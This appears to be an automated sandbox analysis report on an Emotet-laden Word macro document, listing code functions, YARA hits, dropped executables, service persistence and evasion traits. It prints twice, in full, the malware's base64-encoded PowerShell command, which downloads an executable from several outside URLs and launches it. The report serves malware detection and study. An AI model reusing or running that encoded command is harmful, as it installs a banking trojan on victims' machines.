Source: C:\Users\user\209.exeCode function: 3_2_0043CDE83_2_0043CDE8
Source: C:\Users\user\209.exeCode function: 3_2_00460D863_2_00460D86
Source: C:\Users\user\209.exeCode function: 3_2_004610013_2_00461001
Source: C:\Users\user\209.exeCode function: 3_2_0043D2BD3_2_0043D2BD
Source: C:\Users\user\209.exeCode function: 3_2_004613063_2_00461306
Source: C:\Users\user\209.exeCode function: 3_2_0045B40D3_2_0045B40D
Source: C:\Users\user\209.exeCode function: 3_2_0045B60B3_2_0045B60B
Source: C:\Users\user\209.exeCode function: 3_2_0044D6213_2_0044D621
Source: C:\Users\user\209.exeCode function: 3_2_0043D6913_2_0043D691
Source: C:\Users\user\209.exeCode function: 3_2_00461ACA3_2_00461ACA
Source: C:\Users\user\209.exeCode function: 3_2_00423AE83_2_00423AE8
Source: C:\Users\user\209.exeCode function: 3_2_0043DA9D3_2_0043DA9D
Source: C:\Users\user\209.exeCode function: 3_2_00463B1C3_2_00463B1C
Source: C:\Users\user\209.exeCode function: 3_2_00457C433_2_00457C43
Source: C:\Users\user\209.exeCode function: 3_2_0045FCA73_2_0045FCA7
Source: C:\Users\user\209.exeCode function: 3_2_0040BDDB3_2_0040BDDB
Source: C:\Users\user\209.exeCode function: 3_2_0043DEBD3_2_0043DEBD
Source: C:\Users\user\209.exeCode function: 3_2_003C28C13_2_003C28C1
Source: C:\Users\user\209.exeCode function: 3_2_003C30E83_2_003C30E8
Source: C:\Users\user\209.exeCode function: 3_2_003C30E43_2_003C30E4
Source: C:\Users\user\209.exeCode function: 3_2_003E37A93_2_003E37A9
Source: C:\Users\user\209.exeCode function: 3_2_003E37A53_2_003E37A5
Source: C:\Users\user\209.exeCode function: 3_2_003E2F823_2_003E2F82
Source: C:\Users\user\209.exeCode function: 4_2_001F28C14_2_001F28C1
Source: C:\Users\user\209.exeCode function: 4_2_001F30E84_2_001F30E8
Source: C:\Users\user\209.exeCode function: 4_2_001F30E44_2_001F30E4
Source: C:\Users\user\209.exeCode function: 4_2_003E37A94_2_003E37A9
Source: C:\Users\user\209.exeCode function: 4_2_003E37A54_2_003E37A5
Source: C:\Users\user\209.exeCode function: 4_2_003E2F824_2_003E2F82
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_002730E45_2_002730E4
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_002730E85_2_002730E8
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_002728C15_2_002728C1
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_003937A95_2_003937A9
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_003937A55_2_003937A5
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_00392F825_2_00392F82
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F28C16_2_001F28C1
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F30E86_2_001F30E8
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F30E46_2_001F30E4
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_002137A56_2_002137A5
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_002137A96_2_002137A9
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00212F826_2_00212F82
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: gyF9tONev4.docmOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Rmhpjcza, Function Document_openName: Document_open
Document contains embedded VBA macrosShow sources
Source: gyF9tONev4.docmOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: gyF9tONev4.docmOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: gyF9tONev4.docmOLE indicator application name: unknown
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\209.exe 0DDDE52CA3E01FDF8DBAFF394135E34DE7F446D8D47942329F9B9832B3B2246A
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\209.exeCode function: String function: 00403520 appears 35 times
Source: C:\Users\user\209.exeCode function: String function: 0043B240 appears 96 times
Source: C:\Users\user\209.exeCode function: String function: 0043AFA9 appears 36 times
Source: C:\Users\user\209.exeCode function: String function: 00449972 appears 46 times
Source: C:\Users\user\209.exeCode function: String function: 0043AF40 appears 226 times
Source: C:\Users\user\209.exeCode function: String function: 004138C5 appears 35 times
Yara signature matchShow sources
Source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winDOCM@8/11@1/2
Contains functionality to create servicesShow sources
Source: C:\Users\user\209.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003EE4A8
Source: C:\Windows\System32\dvbthunk.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,6_2_0021E4A8
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\209.exeCode function: 3_2_003E1943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_003E1943
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\209.exeCode function: 3_2_00423866 __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,CoInitializeEx,CoCreateInstance,3_2_00423866
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\209.exeCode function: 3_2_004060CC __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,3_2_004060CC
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\209.exeCode function: 4_2_003EE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003EE4A8
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$F9tONev4.docmJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\dvbthunk.exeMutant created: \BaseNamedObjects\Global\ID5DCAC04
Source: C:\Users\user\209.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ID5DCAC04
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\209.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MD5DCAC04
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE8DA.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: gyF9tONev4.docmOLE document summary: title field not present or empty
Source: gyF9tONev4.docmOLE document summary: author field not present or empty
Source: gyF9tONev4.docmOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3._.............3._....@8G.L|._......Sl '._..Sl..j.L|._d............7._......._@8G...8.....t....... '._..._....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...........(......u...................u..0.....|.......................................d.......>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|......._._.G.E.N.U.S. . . . . . . . . . .:. .2.|...........................................(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|..................u...................u..0.....|...............................................>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...#..._._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........#...........>...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...#..............u...................u..0.....|...............................#...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...'..._._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ...|...............................'...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...'..............u...................u..0.....|...............................'...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...+..._._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........+...........>...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...+..............u...................u..0.....|...............................+...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|.../..._._.R.E.L.P.A.T.H. . . . . . . . .:. ...|.............................../...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|.../..............u...................u..0.....|........... .................../...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...3..._._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.|.........../...................3...........(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...3..............u...................u..0.....|...........8...................3...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...7..._._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}...........G...................7...........*...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...7..............u...................u..0.....|...........P...................7...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...;..._._.S.E.R.V.E.R. . . . . . . . . .:. ...|...........^...................;...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...;..............u...................u..0.....|...........g...................;...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...?..._._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...|...........u...................?...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...?..............u...................u..0.....|...........~...................?...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...C..._._.P.A.T.H. . . . . . . . . . . .:. ...|...............................C...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...C..............u...................u..0.....|...............................C...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...G...P.r.o.c.e.s.s.I.d. . . . . . . . .:. .2.3.3.6...........................G...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...G..............u...................u..0.....|...............................G...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...K...R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.|...............................K...........(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...K..............u...................u..0.....|...............................K...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x...|...O..............ux..................u..0.....|...............................O.......X.......>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...S..............u...................u..0.....|...............................S...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...W..............u...................u..0.....|...............................W...............>..u........Jump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\209.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\dvbthunk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\dvbthunk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: gyF9tONev4.docmVirustotal: Detection: 63%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\209.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_3-55303
Source: C:\Windows\System32\dvbthunk.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-4541
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABRAGkAeABnAHgAdQB3AHMAbQB3AGkAcABmAD0AJwBKAHIAcgBtAHIAZwB2AGQAZwBwACcAOwAkAEwAcwBiAGIAbABrAGgAcwBiAGsAdQBrACAAPQAgACcAMgAwADkAJwA7ACQASQB1AGMAbABrAGUAYQBwAD0AJwBaAGEAdwBzAGYAZQBzAHcAZQAnADsAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATABzAGIAYgBsAGsAaABzAGIAawB1AGsAKwAnAC4AZQB4AGUAJwA7ACQAUwBzAGMAeAB5AHMAdQBlAHEAPQAnAEkAcwBrAHMAdQB4AGUAYgBlAHYAdQBpACcAOwAkAFgAcQBpAHIAegBxAGUAbgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQATQBuAHQAYwByAHQAZQBwAGkAPQAnAGgAdAB0AHAAOgAvAC8AYgBvAGwAZQBoAHAAcgBlAGQAaQBrAHMAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaQBmAHIARQBGAFMAcQBTAHcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGUAcwBpAGcAbgBpAG4AZABpAGEALgBsAGkAdgBlAC8AagBzAC8AeQBjAEMASwBxAEgAbAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAYQBpAHIAMgBtAHAAcgBlAHMAcwAuAGMAbwBtAC8AbwBlAGkAdwBvAHMAawAzADYAagAzAHMAcwAvAHcAdAB1AGQAcwAvAHYAZQBkAE0ARABoAGMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB3AG8AcgBsAGQAbgBvAHQAaQBjAGkAYQBzAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAHYAdgBoAGEAYQAwADAAMAB2AGoALQBtAHEAOQA4AHYALQAxADkAOQA4ADgANQAxADgALwAqAGgAdAB0AHAAcwA6AC8ALwA5AGoAYQBiAGwAaQBzAHMALgBjAG8AbQAvAG8AaQByAHgAaQBvAC8AbgB3AGsAZABkAHIALwAnAC4AIgBzAFAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAbwBwAHoAbwBzAGEAaQB3AHEAPQAnAE4AbQBtAGYAawB5AHIAaABzAGUAaABuAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAZwBvAGgAawBzAG8AZgBpAGEAIABpAG4AIAAkAE0AbgB0AGMAcgB0AGUAcABpACkAewB0AHIAeQB7ACQAWABxAGkAcgB6AHEAZQBuAC4AIgBkAG8AdwBgAE4AYABsAE8AYQBgAGQARgBJAGwAZQAiACgAJABWAGcAbwBoAGsAcwBvAGYAaQBhACwAIAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAEMAeQBsAHgAagBqAGwAZABkAGUAZgBjAD0AJwBaAHYAdQBxAHUAawByAHAAeQBrAHYAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwApAC4AIgBsAGAARQBuAGcAVABoACIAIAAtAGcAZQAgADMAMwA2ADIANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAGAAZQBgAEEAVABlACIAKAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAFAAZwBjAHAAdABhAHgAawBsAHMAcgBwAD0AJwBJAGIAZgB3AHMAcABzAGkAbgB3ACcAOwBiAHIAZQBhAGsAOwAkAEEAbgB6AGEAYwBzAHkAcwBvAHgAPQAnAEkAeQB0AHAAawBiAHkAZQBpAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZAHoAdgBiAGgAcwBmAHoAagA9ACcASwBsAHEAegByAGoAdQBrAHkAcAAnAA==
Source: unknownProcess created: C:\Users\user\209.exe C:\Users\user\209.exe
Source: unknownProcess created: C:\Users\user\209.exe --481cd80f
Source: unknownProcess created: C:\Windows\System32\dvbthunk.exe C:\Windows\system32\dvbthunk.exe
Source: unknownProcess created: C:\Windows\System32\dvbthunk.exe --3355b182
Source: C:\Users\user\209.exeProcess created: C:\Users\user\209.exe --481cd80fJump to behavior
Source: C:\Windows\System32\dvbthunk.exeProcess created: C:\Windows\System32\dvbthunk.exe --3355b182Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\209.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb source: 209.exe, 00000003.00000002.972629205.0046A000.00000002.00020000.sdmp, 209.exe, 00000004.00000002.1006021721.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000005.00000000.996939832.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000006.00000000.1004263487.0046A000.00000002.00020000.sdmp, 209.exe.1.dr
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb H0mG source: 209.exe, 00000003.00000002.972629205.0046A000.00000002.00020000.sdmp, 209.exe, 00000004.00000002.1006021721.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000005.00000000.996939832.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000006.00000000.1004263487.0046A000.00000002.00020000.sdmp, 209.exe.1.dr

Data Obfuscation:

barindex
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABRAGkAeABnAHgAdQB3AHMAbQB3AGkAcABmAD0AJwBKAHIAcgBtAHIAZwB2AGQAZwBwACcAOwAkAEwAcwBiAGIAbABrAGgAcwBiAGsAdQBrACAAPQAgACcAMgAwADkAJwA7ACQASQB1AGMAbABrAGUAYQBwAD0AJwBaAGEAdwBzAGYAZQBzAHcAZQAnADsAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATABzAGIAYgBsAGsAaABzAGIAawB1AGsAKwAnAC4AZQB4AGUAJwA7ACQAUwBzAGMAeAB5AHMAdQBlAHEAPQAnAEkAcwBrAHMAdQB4AGUAYgBlAHYAdQBpACcAOwAkAFgAcQBpAHIAegBxAGUAbgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQATQBuAHQAYwByAHQAZQBwAGkAPQAnAGgAdAB0AHAAOgAvAC8AYgBvAGwAZQBoAHAAcgBlAGQAaQBrAHMAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaQBmAHIARQBGAFMAcQBTAHcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGUAcwBpAGcAbgBpAG4AZABpAGEALgBsAGkAdgBlAC8AagBzAC8AeQBjAEMASwBxAEgAbAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAYQBpAHIAMgBtAHAAcgBlAHMAcwAuAGMAbwBtAC8AbwBlAGkAdwBvAHMAawAzADYAagAzAHMAcwAvAHcAdAB1AGQAcwAvAHYAZQBkAE0ARABoAGMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB3AG8AcgBsAGQAbgBvAHQAaQBjAGkAYQBzAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAHYAdgBoAGEAYQAwADAAMAB2AGoALQBtAHEAOQA4AHYALQAxADkAOQA4ADgANQAxADgALwAqAGgAdAB0AHAAcwA6AC8ALwA5AGoAYQBiAGwAaQBzAHMALgBjAG8AbQAvAG8AaQByAHgAaQBvAC8AbgB3AGsAZABkAHIALwAnAC4AIgBzAFAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAbwBwAHoAbwBzAGEAaQB3AHEAPQAnAE4AbQBtAGYAawB5AHIAaABzAGUAaABuAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAZwBvAGgAawBzAG8AZgBpAGEAIABpAG4AIAAkAE0AbgB0AGMAcgB0AGUAcABpACkAewB0AHIAeQB7ACQAWABxAGkAcgB6AHEAZQBuAC4AIgBkAG8AdwBgAE4AYABsAE8AYQBgAGQARgBJAGwAZQAiACgAJABWAGcAbwBoAGsAcwBvAGYAaQBhACwAIAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAEMAeQBsAHgAagBqAGwAZABkAGUAZgBjAD0AJwBaAHYAdQBxAHUAawByAHAAeQBrAHYAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwApAC4AIgBsAGAARQBuAGcAVABoACIAIAAtAGcAZQAgADMAMwA2ADIANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAGAAZQBgAEEAVABlACIAKAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAFAAZwBjAHAAdABhAHgAawBsAHMAcgBwAD0AJwBJAGIAZgB3AHMAcABzAGkAbgB3ACcAOwBiAHIAZQBhAGsAOwAkAEEAbgB6AGEAYwBzAHkAcwBvAHgAPQAnAEkAeQB0AHAAawBiAHkAZQBpAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZAHoAdgBiAGgAcwBmAHoAagA9ACcASwBsAHEAegByAGoAdQBrAHkAcAAnAA==
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_0045A702
PE file contains an invalid checksumShow sources
Source: 209.exe.1.drStatic PE information: real checksum: 0xa5dce should be: 0xa5f77
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\209.exeCode function: 3_2_0040C4CB push edi; ret 3_2_0040C4CC
Source: C:\Users\user\209.exeCode function: 3_2_0040C4D3 push ds; ret 3_2_0040C4D4
Source: C:\Users\user\209.exeCode function: 3_2_0040C4E7 push edi; ret 3_2_0040C4E8
Source: C:\Users\user\209.exeCode function: 3_2_0043B018 push ecx; ret 3_2_0043B02B
Source: C:\Users\user\209.exeCode function: 3_2_0043B285 push ecx; ret 3_2_0043B298

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\dvbthunk.exeExecutable created and started: C:\Windows\System32\dvbthunk.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\209.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\209.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\209.exePE file moved: C:\Windows\System32\dvbthunk.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\209.exeJump to dropped file
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\209.exeCode function: 4_2_003EE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003EE4A8

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\209.exeFile opened: C:\Windows\system32\dvbthunk.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\209.exeCode function: 3_2_00406670 IsIconic,GetWindowPlacement,GetWindowRect,3_2_00406670
